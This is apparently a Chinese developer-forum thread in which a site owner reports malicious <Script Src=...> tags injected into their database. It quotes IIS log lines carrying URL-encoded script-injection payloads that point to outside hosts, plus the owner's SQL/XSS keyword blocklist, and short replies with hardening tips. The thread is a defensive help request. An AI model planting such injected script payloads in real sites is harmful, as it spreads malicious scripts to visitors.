28,391
社区成员
发帖
与我相关
我的任务
分享老问题:数据库数据被恶意修改,过滤代码实效?大家帮帮忙!
数据库表中数据被加入<Script Src=http://sb.5252.ws:88/107/1.js></Script>这样的东西,以前加入过滤语句,好了一段时间,但最近几天还是被黑了,iis日志如下:
2008-12-06 11:02:02 61.186.133.200 GET /expert/expert0104.asp id=20225&titles=%D0%A1%BA%A2%B8%B9%CD%B4<Script%20Src=http://c.nu%63%6Cear3.com/css/c.js></Script>&keshi=%B6%F9%BF%C6 80 - 202.160.178.164 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 200 0 0
2008-12-06 11:40:36 61.186.133.200 GET /edu/edu0202.asp numbername=04065&filename=%C4%DA%B2%E0%B0%EB%D4%C2%B0%E5%C7%D0%B3%FD%CA%F5&keyword=%B0%EB%D4%C2%B0%E5%CB%F0%C9%CB%A3%BB%B0%EB%D4%C2%B0%E5%C4%D2%D6%D7%3CScript+Src%3Dhttp%3A%2F%2Fc%2Enu%2563%256Cear3%2Ecom%2Fcss%2Fc%2Ejs%3E%3C%2FScript%3E 80 - 121.20.244.146 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
怀疑是从提交表单注入的脚本语句,我已加入的过滤字符有 ' and exec insert select delete update count * % chr mid master truncate char declare 1=1 1=2 < Script > from -- %20 == & ; = - iframe CHR(39) _ $ # [ ] / \ nuclear3 . js <pre> </pre> </Script>
请问各位大大帮我分析一下日志,还应该再加入哪些字符, 和怎么过滤掉用户提交表单中的脚本语句<script>...</script> ,万分感谢!!!
2008-12-06 11:02:02 61.186.133.200 GET /expert/expert0104.asp id=20225&titles=%D0%A1%BA%A2%B8%B9%CD%B4<Script%20Src=http://c.nu%63%6Cear3.com/css/c.js></Script>&keshi=%B6%F9%BF%C6 80 - 202.160.178.164 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 200 0 0
2008-12-06 11:40:36 61.186.133.200 GET /edu/edu0202.asp numbername=04065&filename=%C4%DA%B2%E0%B0%EB%D4%C2%B0%E5%C7%D0%B3%FD%CA%F5&keyword=%B0%EB%D4%C2%B0%E5%CB%F0%C9%CB%A3%BB%B0%EB%D4%C2%B0%E5%C4%D2%D6%D7%3CScript+Src%3Dhttp%3A%2F%2Fc%2Enu%2563%256Cear3%2Ecom%2Fcss%2Fc%2Ejs%3E%3C%2FScript%3E 80 - 121.20.244.146 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
怀疑是从提交表单注入的脚本语句,我已加入的过滤字符有 ' and exec insert select delete update count * % chr mid master truncate char declare 1=1 1=2 < Script > from -- %20 == & ; = - iframe CHR(39) _ $ # [ ] / \ nuclear3 . js <pre> </pre> </Script>
请问各位大大帮我分析一下日志,还应该再加入哪些字符, 和怎么过滤掉用户提交表单中的脚本语句<script>...</script> ,万分感谢!!!
...全文
请发表友善的回复…
发表回复
ZKM_ZHANG 2008-12-08
- 打赏
- 举报
sql注入可能性不大。
搬运工865 2008-12-08
- 打赏
- 举报
同上
下载一个 超级补漏洞的代码吧
下载一个 超级补漏洞的代码吧
-晴天 2008-12-08
- 打赏
- 举报
你的查询变量中不是有id了么,还用得着加title干嘛.用id到数据库直接找不就行了.
-晴天 2008-12-08
- 打赏
- 举报
用querystring中用字符型变量带一长串字符来实现功能,实在不是一种好办法.我写程序时,尽一切可能不用这种形式,特别是要向数据写东西的时候,一定要用post方法.而且对传入内容进行检查.
杨哥儿 2008-12-08
- 打赏
- 举报
是其它漏洞的原因.
sw0924 2008-12-08
- 打赏
- 举报
请各位大人帮忙看看,有没有解决方法?
